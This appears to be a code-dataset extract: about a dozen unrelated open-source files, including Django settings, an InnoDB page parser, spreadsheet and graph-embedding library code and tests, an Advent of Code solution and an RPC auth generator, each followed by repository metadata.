1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('compileo.urls'))
]
| 34.652174
| 77
| 0.706399
|
36c797dc1ebe5f81f0c311083c7d168afa7bd650
| 2,179
|
py
|
Python
|
mysql/innodb_page_type/mylib.py
|
DonghuaLau/linux-ammo
|
ed53e0c87dc32f0f7aa4b5bdcf1f8d8029872c06
|
[
"Apache-2.0"
] | null | null | null |
mysql/innodb_page_type/mylib.py
|
DonghuaLau/linux-ammo
|
ed53e0c87dc32f0f7aa4b5bdcf1f8d8029872c06
|
[
"Apache-2.0"
] | null | null | null |
mysql/innodb_page_type/mylib.py
|
DonghuaLau/linux-ammo
|
ed53e0c87dc32f0f7aa4b5bdcf1f8d8029872c06
|
[
"Apache-2.0"
] | null | null | null |
#encoding=utf-8
import os
import include
from include import *
TABLESPACE_NAME='D:\\mysql_data\\test\\t.ibd'
VARIABLE_FIELD_COUNT = 1
NULL_FIELD_COUNT = 0
class myargv(object):
def __init__(self, argv):
self.argv = argv
self.parms = {}
self.tablespace = ''
def parse_cmdline(self):
argv = self.argv
if len(argv) == 1:
print 'Usage: python py_innodb_page_info.py [OPTIONS] tablespace_file'
print 'For more options, use python py_innodb_page_info.py -h'
return 0
while argv:
if argv[0][0] == '-':
if argv[0][1] == 'h':
self.parms[argv[0]] = ''
argv = argv[1:]
break
if argv[0][1] == 'v':
self.parms[argv[0]] = ''
argv = argv[1:]
else:
self.parms[argv[0]] = argv[1]
argv = argv[2:]
else:
self.tablespace = argv[0]
argv = argv[1:]
if self.parms.has_key('-h'):
print 'Get InnoDB Page Info'
print 'Usage: python py_innodb_page_info.py [OPTIONS] tablespace_file\n'
print 'The following options may be given as the first argument:'
print '-h help '
print '-o output put the result to file'
print '-t number thread to anayle the tablespace file'
print '-v verbose mode'
return 0
return 1
def mach_read_from_n(page,start_offset,length):
ret = page[start_offset:start_offset+length]
return ret.encode('hex')
def get_innodb_page_type(myargv):
f=file(myargv.tablespace,'rb')
fsize = os.path.getsize(f.name)/INNODB_PAGE_SIZE
ret = {}
for i in range(fsize):
page = f.read(INNODB_PAGE_SIZE)
page_offset = mach_read_from_n(page,FIL_PAGE_OFFSET,4)
page_type = mach_read_from_n(page,FIL_PAGE_TYPE,2)
if myargv.parms.has_key('-v'):
if page_type == '45bf':
page_level = mach_read_from_n(page,FIL_PAGE_DATA+PAGE_LEVEL,2)
print "page offset %s, page type <%s>, page level <%s>"%(page_offset,innodb_page_type[page_type],page_level)
else:
print "page offset %s, page type <%s>"%(page_offset,innodb_page_type[page_type])
if not ret.has_key(page_type):
ret[page_type] = 1
else:
ret[page_type] = ret[page_type] + 1
print "Total number of page: %d:"%fsize
for type in ret:
print "%s: %s"%(innodb_page_type[type],ret[type])
| 29.849315
| 112
| 0.672327
|
3dc8c16bb9213d97f244daa2803cecd30c566fb0
| 2,681
|
py
|
Python
|
sample.py
|
jaraco/xlsxcessive
|
292d2fb90ebf07781c684f1b8d42f89ffc58d3c2
|
[
"MIT"
] | 3
|
2019-02-06T14:03:58.000Z
|
2021-02-13T20:07:09.000Z
|
sample.py
|
jaraco/xlsxcessive
|
292d2fb90ebf07781c684f1b8d42f89ffc58d3c2
|
[
"MIT"
] | 1
|
2020-11-30T15:43:01.000Z
|
2021-02-13T19:27:00.000Z
|
sample.py
|
jaraco/xlsxcessive
|
292d2fb90ebf07781c684f1b8d42f89ffc58d3c2
|
[
"MIT"
] | 1
|
2019-02-05T14:38:48.000Z
|
2019-02-05T14:38:48.000Z
|
"""Just a simple example of XlsXcessive API usage."""
from xlsxcessive.workbook import Workbook
from xlsxcessive.worksheet import Cell
wb = Workbook()
sheet = wb.new_sheet('Test Sheet')
# a shared format
bigguy = wb.stylesheet.new_format()
bigguy.font(size=24)
bigguy.align('center')
# add a border
bigguy.border(top="medium", bottom="medium")
# set a builtin number format
bigguy.number_format('0.00')
# another shared format
boldfont = wb.stylesheet.new_format()
boldfont.font(bold=True)
# and another
highprec = wb.stylesheet.new_format()
# set a custom number format on the shared format
highprec.number_format("0.000")
# the API supports adding rows
row1 = sheet.row(1)
# rows support adding cells - cells can currently store strings, numbers
# and formulas.
a1 = row1.cell("A1", "Hello, World!", format=boldfont)
row1.cell("C1", 42.0, format=bigguy)
# cells can be merged with other cells - there is no checking on invalid merges
# though. merge at your own risk!
a1.merge(Cell('B1'))
# adding rows is easy
row2 = sheet.row(2)
row2.cell("B2", "Foo")
row2.cell("C2", 1, format=bigguy)
# formulas are written as strings and can have default values
shared_formula = sheet.formula("SUM(C1, C2)", 43.0, shared=True)
row3 = sheet.row(3)
row3.cell("C3", shared_formula, format=bigguy)
# you can work with cells directly on the sheet
sheet.cell('D1', 12.0005, format=highprec)
sheet.cell('D2', 11.9995, format=highprec)
sheet.cell('D3', shared_formula, format=highprec)
# and directly via row and column indicies
sheet.cell(coords=(0, 4), value=40)
sheet.cell(coords=(1, 4), value=2)
sheet.cell(coords=(2, 4), value=shared_formula)
# you can share a formula in a non-contiguous range of cells
times_two = sheet.formula('PRODUCT(A4, 2)', shared=True)
sheet.cell('A4', 12)
sheet.cell('B4', times_two)
sheet.cell('C4', 50)
sheet.cell('D4', times_two)
# iteratively adding data is easy now
for rowidx in range(5, 10):
for colidx in range(5, 11, 2):
sheet.cell(coords=(rowidx, colidx), value=rowidx * colidx)
# set column widths
sheet.col(number=2, width=5)
# write unicode value
sheet.cell('G2', value=u"43\u00b0")
if __name__ == '__main__':
import os
import sys
from xlsxcessive.xlsx import save
if len(sys.argv) == 1:
print("USAGE: python sample.py NEWFILEPATH")
print("Writes a sample .xlsx file to NEWFILEPATH")
raise SystemExit(1)
if os.path.exists(sys.argv[1]):
print("Aborted. File', sys.argv[1], 'already exists.")
raise SystemExit(1)
stream = None
if sys.argv[1] == '-':
stream = sys.stdout
# wb is the Workbook created above
save(wb, sys.argv[1], stream)
| 26.284314
| 79
| 0.700858
|
1adddad957388bd55d1afec3d976dc5d36eb9c06
| 359
|
py
|
Python
|
tests/video_with_line.py
|
FRCTeam1073-TheForceTeam/openmv21
|
b5a5d9b4da172861b012e559df7bd640fc6b9e72
|
[
"MIT"
] | 1
|
2021-07-07T15:33:31.000Z
|
2021-07-07T15:33:31.000Z
|
tests/video_with_line.py
|
FRCTeam1073-TheForceTeam/openmv21
|
b5a5d9b4da172861b012e559df7bd640fc6b9e72
|
[
"MIT"
] | null | null | null |
tests/video_with_line.py
|
FRCTeam1073-TheForceTeam/openmv21
|
b5a5d9b4da172861b012e559df7bd640fc6b9e72
|
[
"MIT"
] | null | null | null |
import image, pyb, time
clock = time.clock()
img_reader = image.ImageIO("/test_stream.bin", "r")
while(True):
clock.tick()
img = img_reader.read(copy_to_fb=True, loop=True, pause=True)
img.draw_line((0, 0, img.width(), img.height()), color = (255, 0, 0), thickness = 10)
img.draw_rectangle(104,79,119,96)
time.sleep(1);
img_write.close
| 25.642857
| 89
| 0.662953
|
51e63fb57fc9d3ad0d689793ef83ceb2019219be
| 672
|
py
|
Python
|
valpal/util.py
|
clld/valpal
|
52187bc5c332c042d4e52bb05dca91f5d71e1657
|
[
"Apache-2.0"
] | null | null | null |
valpal/util.py
|
clld/valpal
|
52187bc5c332c042d4e52bb05dca91f5d71e1657
|
[
"Apache-2.0"
] | 2
|
2020-09-08T14:27:07.000Z
|
2021-10-18T14:15:39.000Z
|
valpal/util.py
|
clld/valpal
|
52187bc5c332c042d4e52bb05dca91f5d71e1657
|
[
"Apache-2.0"
] | null | null | null |
from clld.db.models.common import Contribution
from clld.interfaces import IRepresentation
from clld.web.adapters import get_adapter
def dataset_detail_html(context=None, request=None, **kw):
return {
'example_contribution': Contribution.get('icel1247'),
'citation': get_adapter(IRepresentation, context, request, ext='md.txt'),
'bibtex': get_adapter(IRepresentation, context, request, ext='md.bib')}
def contribution_detail_html(context=None, request=None, **kw):
return {
'citation': get_adapter(IRepresentation, context, request, ext='md.txt'),
'bibtex': get_adapter(IRepresentation, context, request, ext='md.bib')}
| 39.529412
| 81
| 0.724702
|
41b6c96307766690f7c989284ae94e16d9aaac8a
| 3,073
|
py
|
Python
|
tests/test_sampling/test_negative_samplers.py
|
Rodrigo-A-Pereira/pykeen
|
76c5acb707faa524b5951b0d1d85ab1afe806462
|
[
"MIT"
] | null | null | null |
tests/test_sampling/test_negative_samplers.py
|
Rodrigo-A-Pereira/pykeen
|
76c5acb707faa524b5951b0d1d85ab1afe806462
|
[
"MIT"
] | null | null | null |
tests/test_sampling/test_negative_samplers.py
|
Rodrigo-A-Pereira/pykeen
|
76c5acb707faa524b5951b0d1d85ab1afe806462
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Test that samplers can be executed."""
from pykeen.sampling import BasicNegativeSampler, BernoulliNegativeSampler, PseudoTypedNegativeSampler
from pykeen.sampling.pseudo_type import create_index
from tests.test_sampling import cases
class BasicNegativeSamplerTest(cases.NegativeSamplerGenericTestCase):
"""Test the basic negative sampler."""
cls = BasicNegativeSampler
def test_sample_basic(self):
"""Test if relations and half of heads and tails are not corrupted."""
negative_batch, batch_filter = self.instance.sample(positive_batch=self.positive_batch)
# Test that half of the subjects and half of the objects are corrupted
positive_batch = self.positive_batch.unsqueeze(dim=1)
num_triples = negative_batch[..., 0].numel()
half_size = num_triples // 2
num_subj_corrupted = (positive_batch[..., 0] != negative_batch[..., 0]).sum()
num_obj_corrupted = (positive_batch[..., 2] != negative_batch[..., 2]).sum()
assert num_obj_corrupted - 1 <= num_subj_corrupted
assert num_subj_corrupted - 1 <= num_obj_corrupted
assert num_subj_corrupted - 1 <= num_triples
assert half_size - 1 <= num_subj_corrupted
class BernoulliNegativeSamplerTest(cases.NegativeSamplerGenericTestCase):
"""Test the Bernoulli negative sampler."""
cls = BernoulliNegativeSampler
class PseudoTypedNegativeSamplerTest(cases.NegativeSamplerGenericTestCase):
"""Test the pseudo-type negative sampler."""
cls = PseudoTypedNegativeSampler
def test_corrupt_batch(self):
"""Additional test for corrupt_batch."""
positive_batch = self.positive_batch.unsqueeze(dim=1)
negative_batch = self.instance.corrupt_batch(positive_batch=self.positive_batch)
# same relation
assert (negative_batch[..., 1] == positive_batch[..., 1]).all()
# only corruption of a single entity (note: we do not check for exactly 2, since we do not filter).
assert ((negative_batch == positive_batch).sum(dim=-1) >= 2).all()
# check that corrupted entities co-occur with the relation in training data
for entity_pos in (0, 2):
er_training = {(r, e) for r, e in self.triples_factory.mapped_triples[:, [1, entity_pos]].tolist()}
er_negative = {(r, e) for r, e in negative_batch.view(-1, 3)[:, [1, entity_pos]].tolist()}
assert er_negative.issubset(er_training)
def test_index_structure(self):
"""Test the index structure."""
data, offsets = create_index(triples_factory=self.triples_factory)
triples = self.triples_factory.mapped_triples
for r in range(self.triples_factory.num_relations):
triples_with_r = triples[triples[:, 1] == r]
for i, entity_pos in enumerate((0, 2)):
index_entities = set(data[offsets[2 * r + i]: offsets[2 * r + i + 1]].tolist())
triple_entities = set(triples_with_r[:, entity_pos].tolist())
assert index_entities == triple_entities
| 46.560606
| 111
| 0.684348
|
c3229f0ff0e21d4c2bb8cd6b5fe3e43c9acb0555
| 2,013
|
py
|
Python
|
2015/day15/day15.py
|
e-jameson/aoc
|
f26196d5564a9ac8027532c276af00aaf3718c6e
|
[
"MIT"
] | null | null | null |
2015/day15/day15.py
|
e-jameson/aoc
|
f26196d5564a9ac8027532c276af00aaf3718c6e
|
[
"MIT"
] | null | null | null |
2015/day15/day15.py
|
e-jameson/aoc
|
f26196d5564a9ac8027532c276af00aaf3718c6e
|
[
"MIT"
] | null | null | null |
from helpers import as_list
ingredients = dict()
# lines = as_list('2015/day15/example-input.txt')
lines = as_list('2015/day15/input.txt')
for line in lines:
name, stats = line.split(': ')
ingredients.setdefault(name, dict())
for stat in stats.split(', '):
t, v = stat.split()
ingredients[name][t] = int(v)
def max_ingredients(ingredients, count_cals=False):
high = -1
for a in range(1,100):
for b in range(1, 100):
for c in range(1, 100):
for d in range(1, 100):
if a + b + c + d> 100:
continue
# a: Frosting
# b: Candy
# c: Butterscotch
# d: Sugar
frosting = ingredients['Frosting']
candy = ingredients['Candy']
butterscotch = ingredients['Butterscotch']
sugar = ingredients['Sugar']
if count_cals:
cals = a*frosting['calories'] + b*candy['calories'] + c*butterscotch['calories'] + d*sugar['calories']
if cals != 500:
continue
capacity = max(0, a*frosting['capacity'] + b*candy['capacity'] + c*butterscotch['capacity'] + d*sugar['capacity'])
durability = max(0, a*frosting['durability'] + b*candy['durability'] + c*butterscotch['durability'] + d*sugar['durability'])
flavor = max(0, a*frosting['flavor'] + b*candy['flavor'] + c*butterscotch['flavor'] + d*sugar['flavor'])
texture = max(0, a*frosting['texture'] + b*candy['texture'] + c*butterscotch['texture'] + d*sugar['texture'])
val = capacity * durability * flavor * texture
high = max(high, val)
return high
print('2015 Day 15 Part 1')
print(max_ingredients(ingredients, False))
print('2015 Day 15 Part 2')
print(max_ingredients(ingredients, True))
| 37.981132
| 144
| 0.522603
|
596d3b94c66bde9152c7911e958e22a0d64d5015
| 1,115
|
py
|
Python
|
share/rpcauth/rpcauth.py
|
unelmacoin/unelmacoin
|
35e3ec841296133e33778f1a27c90d3aa6761c3f
|
[
"MIT"
] | 4
|
2021-05-03T13:29:56.000Z
|
2021-05-30T14:37:29.000Z
|
share/rpcauth/rpcauth.py
|
unelmacoin/unelmacoin
|
35e3ec841296133e33778f1a27c90d3aa6761c3f
|
[
"MIT"
] | 1
|
2021-05-07T13:41:09.000Z
|
2021-05-08T06:55:48.000Z
|
share/rpcauth/rpcauth.py
|
unelmacoin/unelmacoin
|
35e3ec841296133e33778f1a27c90d3aa6761c3f
|
[
"MIT"
] | 1
|
2021-05-07T13:30:16.000Z
|
2021-05-07T13:30:16.000Z
|
#!/usr/bin/env python
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import hashlib
import sys
import os
from random import SystemRandom
import base64
import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(0)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
print("String to be appended to unelmacoin.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password)
| 26.547619
| 79
| 0.729148
|
34c05c60fa58f9e2a91ef5967d59e433c8a8bca8
| 3,443
|
py
|
Python
|
probreg/cost_functions.py
|
OscarPellicer/probreg
|
8f1dd23dd86371b8040abad580332ff36967c078
|
[
"MIT"
] | 479
|
2019-03-06T16:24:01.000Z
|
2022-03-31T08:38:54.000Z
|
probreg/cost_functions.py
|
OscarPellicer/probreg
|
8f1dd23dd86371b8040abad580332ff36967c078
|
[
"MIT"
] | 86
|
2019-05-15T19:10:53.000Z
|
2022-03-26T06:14:54.000Z
|
probreg/cost_functions.py
|
OscarPellicer/probreg
|
8f1dd23dd86371b8040abad580332ff36967c078
|
[
"MIT"
] | 101
|
2019-03-21T08:52:58.000Z
|
2022-03-01T19:13:39.000Z
|
from __future__ import division, print_function
import abc
import numpy as np
import six
import transforms3d as t3d
from . import gauss_transform as gt
from . import se3_op as so
from . import transformation as tf
@six.add_metaclass(abc.ABCMeta)
class CostFunction:
def __init__(self, tf_type):
self._tf_type = tf_type
@abc.abstractmethod
def to_transformation(self, theta):
return None
@abc.abstractmethod
def initial(self):
return None
@abc.abstractmethod
def __call__(self, theta, *args):
return None, None
def compute_l2_dist(mu_source, phi_source, mu_target, phi_target, sigma):
z = np.power(2.0 * np.pi * sigma ** 2, mu_source.shape[1] * 0.5)
gtrans = gt.GaussTransform(mu_target, np.sqrt(2.0) * sigma)
phi_j_e = gtrans.compute(mu_source, phi_target / z)
phi_mu_j_e = gtrans.compute(mu_source, phi_target * mu_target.T / z).T
g = (phi_source * phi_j_e * mu_source.T - phi_source * phi_mu_j_e.T).T / (2.0 * sigma ** 2)
return -np.dot(phi_source, phi_j_e), g
class RigidCostFunction(CostFunction):
def __init__(self):
self._tf_type = tf.RigidTransformation
def to_transformation(self, theta):
rot = t3d.quaternions.quat2mat(theta[:4])
return self._tf_type(rot, theta[4:7])
def initial(self):
x0 = np.zeros(7)
x0[0] = 1.0
return x0
def __call__(self, theta, *args):
mu_source, phi_source, mu_target, phi_target, sigma = args
tf_obj = self.to_transformation(theta)
t_mu_source = tf_obj.transform(mu_source)
f, g = compute_l2_dist(t_mu_source, phi_source, mu_target, phi_target, sigma)
d_rot = so.diff_rot_from_quaternion(theta[:4])
gtm0 = np.dot(g.T, mu_source)
grad = np.concatenate([(gtm0 * d_rot).sum(axis=(1, 2)), g.sum(axis=0)])
return f, grad
class TPSCostFunction(CostFunction):
def __init__(self, control_pts, alpha=1.0, beta=0.1):
self._tf_type = tf.TPSTransformation
self._alpha = alpha
self._beta = beta
self._control_pts = control_pts
def to_transformation(self, theta):
dim = self._control_pts.shape[1]
n_data = theta.shape[0] // dim
n_a = dim * (dim + 1)
a = theta[:n_a].reshape(dim + 1, dim)
v = theta[n_a:].reshape(n_data - dim - 1, dim)
return self._tf_type(a, v, self._control_pts)
def initial(self):
dim = self._control_pts.shape[1]
a = np.r_[np.zeros((1, dim)), np.identity(dim)]
v = np.zeros((self._control_pts.shape[0] - dim - 1, dim))
return np.r_[a, v].flatten()
def __call__(self, theta, *args):
dim = self._control_pts.shape[1]
mu_source, phi_source, mu_target, phi_target, sigma = args
tf_obj = self.to_transformation(theta)
basis, kernel = tf_obj.prepare(mu_source)
t_mu_source = tf_obj.transform_basis(basis)
bending = np.trace(np.dot(tf_obj.v.T, np.dot(kernel, tf_obj.v)))
f1, g1 = compute_l2_dist(t_mu_source, phi_source, t_mu_source, phi_source, sigma)
f2, g2 = compute_l2_dist(t_mu_source, phi_source, mu_target, phi_target, sigma)
f = -f1 + 2.0 * f2
g = -2.0 * g1 + 2.0 * g2
grad = self._alpha * np.dot(basis.T, g)
grad[dim + 1 :, :] += 2.0 * self._beta * np.dot(kernel, tf_obj.v)
return self._alpha * f + self._beta * bending, grad.flatten()
| 34.43
| 95
| 0.639559
|
2e4fd1215cc44b1f4c3cb4456512ee25d4e94ca6
| 1,181
|
py
|
Python
|
boost/tools/build/v2/test/builtin_exit.py
|
randolphwong/mcsema
|
eb5b376736e7f57ff0a61f7e4e5a436bbb874720
|
[
"BSD-3-Clause"
] | 11
|
2016-04-12T16:29:29.000Z
|
2021-06-28T11:01:57.000Z
|
boost/tools/build/v2/test/builtin_exit.py
|
randolphwong/mcsema
|
eb5b376736e7f57ff0a61f7e4e5a436bbb874720
|
[
"BSD-3-Clause"
] | 3
|
2018-10-31T19:35:14.000Z
|
2019-06-04T17:11:27.000Z
|
boost/tools/build/v2/test/builtin_exit.py
|
randolphwong/mcsema
|
eb5b376736e7f57ff0a61f7e4e5a436bbb874720
|
[
"BSD-3-Clause"
] | 9
|
2015-09-09T02:38:32.000Z
|
2021-01-30T00:24:24.000Z
|
#!/usr/bin/python
# Copyright 2012 Steven Watanabe
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# This tests the EXIT rule.
import BoostBuild
def test_exit(name):
t = BoostBuild.Tester(pass_toolset=0)
t.write("file.jam", """
%s ;
""" % name)
t.run_build_system("-ffile.jam", status=1, stdout="\n")
t.rm(".")
t.write("file.jam", """
%s : 0 ;
""" % name)
t.run_build_system("-ffile.jam", stdout="\n")
t.rm(".")
t.write("file.jam", """
%s : 1 ;
""" % name)
t.run_build_system("-ffile.jam", status=1, stdout="\n")
t.rm(".")
t.write("file.jam", """
%s : 2 ;
""" % name)
t.run_build_system("-ffile.jam", status=2, stdout="\n")
t.rm(".")
t.write("file.jam", """
%s a message ;
""" % name)
t.run_build_system("-ffile.jam", status=1, stdout="a message\n")
t.rm(".")
t.write("file.jam", """
%s a message : 0 ;
""" % name)
t.run_build_system("-ffile.jam", stdout="a message\n")
t.rm(".")
t.cleanup()
test_exit("EXIT")
test_exit("Exit")
test_exit("exit")
| 21.472727
| 81
| 0.560542
|
b25993f4de9d53deef4e49914e08c5154da9ff1f
| 9,839
|
py
|
Python
|
{{cookiecutter.project_slug}}/config/settings/common.py
|
gofullthrottle/cookiecutter-django-mysql-2016
|
f6e0d84a9183462a2e82f256dff07ef85ed13ca5
|
[
"Apache-2.0"
] | 4
|
2016-10-28T00:34:13.000Z
|
2017-10-20T02:08:09.000Z
|
{{cookiecutter.project_slug}}/config/settings/common.py
|
gofullthrottle/cookiecutter-django-mysql-2016
|
f6e0d84a9183462a2e82f256dff07ef85ed13ca5
|
[
"Apache-2.0"
] | null | null | null |
{{cookiecutter.project_slug}}/config/settings/common.py
|
gofullthrottle/cookiecutter-django-mysql-2016
|
f6e0d84a9183462a2e82f256dff07ef85ed13ca5
|
[
"Apache-2.0"
] | 1
|
2020-07-07T18:33:47.000Z
|
2020-07-07T18:33:47.000Z
|
# -*- coding: utf-8 -*-
"""
Django settings for {{cookiecutter.project_name}} project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # ({{ cookiecutter.project_slug }}/config/settings/common.py - 3 = {{ cookiecutter.project_slug }}/)
APPS_DIR = ROOT_DIR.path('{{ cookiecutter.project_slug }}')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
# custom users app
'{{ cookiecutter.project_slug }}.users.apps.UsersConfig',
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': '{{ cookiecutter.project_slug }}.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool('DJANGO_DEBUG', False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""{{cookiecutter.author_name}}""", '{{cookiecutter.email}}'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db('DATABASE_URL', default='postgres://{% if cookiecutter.windows == 'y' %}localhost{% endif %}/{{cookiecutter.project_slug}}'),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = '{{ cookiecutter.timezone }}'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
ACCOUNT_ADAPTER = '{{cookiecutter.project_slug}}.users.adapters.AccountAdapter'
SOCIALACCOUNT_ADAPTER = '{{cookiecutter.project_slug}}.users.adapters.SocialAccountAdapter'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
{% if cookiecutter.use_celery == 'y' %}
########## CELERY
INSTALLED_APPS += ('{{cookiecutter.project_slug}}.taskapp.celery.CeleryConfig',)
# if you are not using the django database broker (e.g. rabbitmq, redis, memcached), you can remove the next line.
INSTALLED_APPS += ('kombu.transport.django',)
BROKER_URL = env('CELERY_BROKER_URL', default='django://')
if BROKER_URL == 'django://':
CELERY_RESULT_BACKEND = 'redis://'
else:
CELERY_RESULT_BACKEND = BROKER_URL
########## END CELERY
{% endif %}
# django-compressor
# ------------------------------------------------------------------------------
{% if cookiecutter.use_compressor == 'y'-%}
INSTALLED_APPS += ("compressor", )
STATICFILES_FINDERS += ("compressor.finders.CompressorFinder", )
{%- endif %}
# Location of root django.contrib.admin URL, use {% raw %}{% url 'admin:index' %}{% endraw %}
ADMIN_URL = r'^admin/'
{% if cookiecutter.js_task_runner == 'Webpack' %}
# WEBPACK
